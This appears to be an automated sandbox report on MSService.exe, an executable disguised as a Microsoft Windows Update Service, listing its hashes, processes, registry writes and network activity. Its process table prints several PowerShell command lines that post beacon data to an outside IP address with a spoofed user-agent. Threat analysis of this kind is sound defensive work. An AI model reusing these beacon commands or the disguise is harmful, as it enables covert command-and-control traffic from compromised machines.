| File name: | MSService.exe |
| Full analysis: | https://app.any.run/tasks/7ff62d3c-8c86-4bc3-b3b0-ef870428970e |
| Verdict: | Malicious activity |
| Analysis date: | September 07, 2024, 23:04:37 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows |
| MD5: | EC294B697F39B8EC154B86E91BE6957E |
| SHA1: | AE719714439FE37811AEA360ED42A586BD6E3353 |
| SHA256: | 704DC6619A90FF82C8977BD4DD7167830D4DE83BD7EB46B511105A9D33048A1F |
| SSDEEP: | 49152:wkQ1DJa1KfYIW/Xk62+2J/CwjzMu7UBgKpIzOoU6p:ej/P+ |
MALICIOUS
No malicious indicators.SUSPICIOUS
Starts a Microsoft application from unusual location
- MSService.exe (PID: 4004)
Process drops legitimate windows executable
- MSService.exe (PID: 4004)
Starts POWERSHELL.EXE for commands execution
- MSService.exe (PID: 4004)
Found IP address in command line
- powershell.exe (PID: 6004)
- powershell.exe (PID: 4708)
- powershell.exe (PID: 6744)
- powershell.exe (PID: 6480)
- powershell.exe (PID: 4644)
Connects to the server without a host name
- powershell.exe (PID: 6004)
- powershell.exe (PID: 4708)
- powershell.exe (PID: 4644)
- powershell.exe (PID: 6480)
Request a resource from the Internet using PowerShell's cmdlet
- MSService.exe (PID: 4004)
INFO
Checks supported languages
- MSService.exe (PID: 4004)
Disables trace logs
- powershell.exe (PID: 6744)
- powershell.exe (PID: 6004)
- powershell.exe (PID: 4708)
- powershell.exe (PID: 4644)
- powershell.exe (PID: 6480)
Checks proxy server information
- powershell.exe (PID: 6744)
- powershell.exe (PID: 6004)
- powershell.exe (PID: 4644)
- powershell.exe (PID: 4708)
- powershell.exe (PID: 6480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win64 Executable (generic) (87.3) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (6.3) |
| .exe | | | DOS Executable Generic (6.3) |
EXIF
EXE
| MachineType: | AMD AMD64 |
|---|---|
| TimeStamp: | 0000:00:00 00:00:00 |
| ImageFileCharacteristics: | Executable, Large address aware, No debug |
| PEType: | PE32+ |
| LinkerVersion: | 3 |
| CodeSize: | 821760 |
| InitializedDataSize: | 106496 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x63b80 |
| OSVersion: | 6.1 |
| ImageVersion: | 1 |
| SubsystemVersion: | 6.1 |
| Subsystem: | Windows command line |
| FileVersionNumber: | 10.0.19041.546 |
| ProductVersionNumber: | 10.0.19041.546 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Windows NT 32-bit |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | English (U.S.) |
| CharacterSet: | Unicode |
| CompanyName: | Microsoft Corporation |
| FileDescription: | Microsoft Windows Update Service |
| FileVersion: | 10.0.19041.546 |
| InternalName: | msservice |
| LegalCopyright: | © Microsoft Corporation. All rights reserved. |
| OriginalFileName: | MSServic.exe |
| ProductName: | Microsoft® Windows® Operating System |
| ProductVersion: | 10.0.19041.546 |
Total processes
138
Monitored processes
9
Malicious processes
1
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 3028 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3900 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | MSService.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4004 | "C:\Users\admin\AppData\Local\Temp\MSService.exe" | C:\Users\admin\AppData\Local\Temp\MSService.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Windows Update Service Version: 10.0.19041.546 Modules
| |||||||||||||||
| 4060 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | — | SppExtComObj.Exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4644 | powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | MSService.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4708 | powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | MSService.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6004 | powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | MSService.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6480 | powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | MSService.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6744 | powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | MSService.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
24 430
Read events
24 416
Write events
14
Delete events
0
Modification events
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6744) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
Executable files
0
Suspicious files
1
Text files
10
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6004 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_np2ybhxw.zbu.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6744 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nrjgk1uw.o0z.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4708 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b2kkw1zf.23m.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6004 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_q43wznxw.4q5.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4644 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0mwcq2ty.0lt.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qhg4qz4x.4wy.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6480 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kvy0rq31.kxt.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4708 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bwqwj2m3.l4d.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6744 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lybiccjv.nzx.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4644 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_emee1ykr.czh.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
30
DNS requests
13
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
7080 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6744 | powershell.exe | POST | 200 | 44.207.250.251:80 | http://44.207.250.251/post | unknown | — | — | unknown |
6004 | powershell.exe | POST | 200 | 44.207.250.251:80 | http://44.207.250.251/post | unknown | — | — | unknown |
6112 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7108 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
4644 | powershell.exe | POST | 200 | 44.207.250.251:80 | http://44.207.250.251/post | unknown | — | — | unknown |
7108 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
4708 | powershell.exe | POST | 200 | 44.207.250.251:80 | http://44.207.250.251/post | unknown | — | — | unknown |
6480 | powershell.exe | POST | 200 | 44.207.250.251:80 | http://44.207.250.251/post | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
6224 | RUXIMICS.exe | 52.167.249.196:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2120 | MoUsoCoreWorker.exe | 52.167.249.196:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
7080 | svchost.exe | 52.167.249.196:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
6744 | powershell.exe | 44.207.250.251:80 | — | AMAZON-AES | US | unknown |
7080 | svchost.exe | 20.44.239.154:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | SG | whitelisted |
7080 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
6004 | powershell.exe | 44.207.250.251:80 | — | AMAZON-AES | US | unknown |
2120 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |